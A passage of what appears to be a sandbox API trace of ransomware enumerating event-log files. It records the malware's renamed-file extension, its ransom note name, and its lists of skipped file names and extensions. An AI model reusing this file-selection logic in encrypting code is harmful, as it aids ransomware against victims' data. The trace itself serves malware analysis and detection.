psz2="ntuser.dat") returned -1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="ntldr") returned -1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="ntdetect.com") returned -1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="bootfont.bin") returned 1 [0071.862] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.862] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned=".evtx" [0071.862] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.862] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.862] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.862] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.862] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.862] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.862] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.863] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cAlternateFileName="MI07E1~1.EVT")) returned 1 [0071.863] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2=".") returned 1 [0071.863] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="..") returned 1 [0071.863] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.863] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.863] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" [0071.863] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned=".evtx" [0071.863] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="bootsect.bak") returned 1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="iconcache.db") returned 1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="thumbs.db") returned -1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2=" ransomware ") returned 1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2=" ransom ") returned 1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="debug.txt") returned 1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="boot.ini") returned 1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="desktop.ini") returned 1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="autorun.inf") returned 1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="ntuser.dat") returned -1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="ntldr") returned -1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="ntdetect.com") returned -1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="bootfont.bin") returned 1 [0071.863] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.863] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned=".evtx" [0071.863] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.863] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.863] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.863] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.863] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.863] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.864] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.864] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cAlternateFileName="MI8196~1.EVT")) returned 1 [0071.864] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2=".") returned 1 [0071.864] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="..") returned 1 [0071.864] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.864] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.864] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" [0071.864] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned=".evtx" [0071.864] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.864] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="bootsect.bak") returned 1 [0071.864] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="iconcache.db") returned 1 [0071.864] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="thumbs.db") returned -1 [0071.864] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2=" ransomware ") returned 1 [0071.864] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2=" ransom ") returned 1 [0071.864] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="debug.txt") returned 1 [0071.864] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="boot.ini") returned 1 [0071.864] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="desktop.ini") returned 1 [0071.864] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="autorun.inf") returned 1 [0071.864] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="ntuser.dat") returned -1 [0071.864] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="ntldr") returned -1 [0071.864] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="ntdetect.com") returned -1 [0071.865] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="bootfont.bin") returned 1 [0071.865] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.865] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned=".evtx" [0071.865] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.865] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.865] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.865] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.865] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.865] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.865] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.865] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41b5f2d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd41b5f2d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cAlternateFileName="MIE36C~1.EVT")) returned 1 [0071.865] StrCmpW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2=".") returned 1 [0071.865] StrCmpW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="..") returned 1 [0071.865] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.865] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.865] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" [0071.865] PathFindExtensionW (pszPath="Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned=".evtx" [0071.865] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.865] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="bootsect.bak") returned 1 [0071.865] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="iconcache.db") returned 1 [0071.865] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="thumbs.db") returned -1 [0071.865] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2=" ransomware ") returned 1 [0071.865] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2=" ransom ") returned 1 [0071.865] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="debug.txt") returned 1 [0071.865] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="boot.ini") returned 1 [0071.865] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="desktop.ini") returned 1 [0071.865] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="autorun.inf") returned 1 [0071.865] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="ntuser.dat") returned -1 [0071.865] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="ntldr") returned -1 [0071.866] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="ntdetect.com") returned -1 [0071.866] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="bootfont.bin") returned 1 [0071.866] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.866] PathFindExtensionW (pszPath="Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned=".evtx" [0071.866] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.866] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.866] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.866] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.866] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.866] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.866] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.866] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd389efbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd389efbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppReadiness%4Admin.evtx", cAlternateFileName="MIC5CB~1.EVT")) returned 1 [0071.866] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2=".") returned 1 [0071.866] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="..") returned 1 [0071.866] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.866] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.866] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppReadiness%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" [0071.866] PathFindExtensionW (pszPath="Microsoft-Windows-AppReadiness%4Admin.evtx") returned=".evtx" [0071.866] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.866] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="bootsect.bak") returned 1 [0071.866] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="iconcache.db") returned 1 [0071.866] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="thumbs.db") returned -1 [0071.866] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2=" ransomware ") returned 1 [0071.866] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2=" ransom ") returned 1 [0071.866] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="debug.txt") returned 1 [0071.866] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="boot.ini") returned 1 [0071.866] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="desktop.ini") returned 1 [0071.866] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="autorun.inf") returned 1 [0071.867] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="ntuser.dat") returned -1 [0071.867] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="ntldr") returned -1 [0071.867] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="ntdetect.com") returned -1 [0071.867] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="bootfont.bin") returned 1 [0071.867] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.867] PathFindExtensionW (pszPath="Microsoft-Windows-AppReadiness%4Admin.evtx") returned=".evtx" [0071.867] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.867] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.867] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.867] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.867] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.867] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.867] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.867] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38c5212, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd38c5212, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppReadiness%4Operational.evtx", cAlternateFileName="MIF8AA~1.EVT")) returned 1 [0071.867] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2=".") returned 1 [0071.867] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="..") returned 1 [0071.867] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.867] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.867] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppReadiness%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" [0071.867] PathFindExtensionW (pszPath="Microsoft-Windows-AppReadiness%4Operational.evtx") returned=".evtx" [0071.867] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.867] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.867] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.867] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.867] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.867] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2=" ransom ") returned 1 [0071.867] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="debug.txt") returned 1 [0071.868] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="boot.ini") returned 1 [0071.868] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.868] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.868] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.868] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="ntldr") returned -1 [0071.868] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.868] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.868] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.868] PathFindExtensionW (pszPath="Microsoft-Windows-AppReadiness%4Operational.evtx") returned=".evtx" [0071.868] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.868] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.868] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.868] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.868] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.868] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.868] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.868] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeployment%4Operational.evtx", cAlternateFileName="MI34FE~1.EVT")) returned 1 [0071.868] StrCmpW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2=".") returned 1 [0071.868] StrCmpW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="..") returned 1 [0071.868] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.868] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.868] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppXDeployment%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" [0071.868] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeployment%4Operational.evtx") returned=".evtx" [0071.868] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.868] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.869] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.869] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.869] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.869] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2=" ransom ") returned 1 [0071.869] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="debug.txt") returned 1 [0071.869] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="boot.ini") returned 1 [0071.869] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.869] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.869] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", 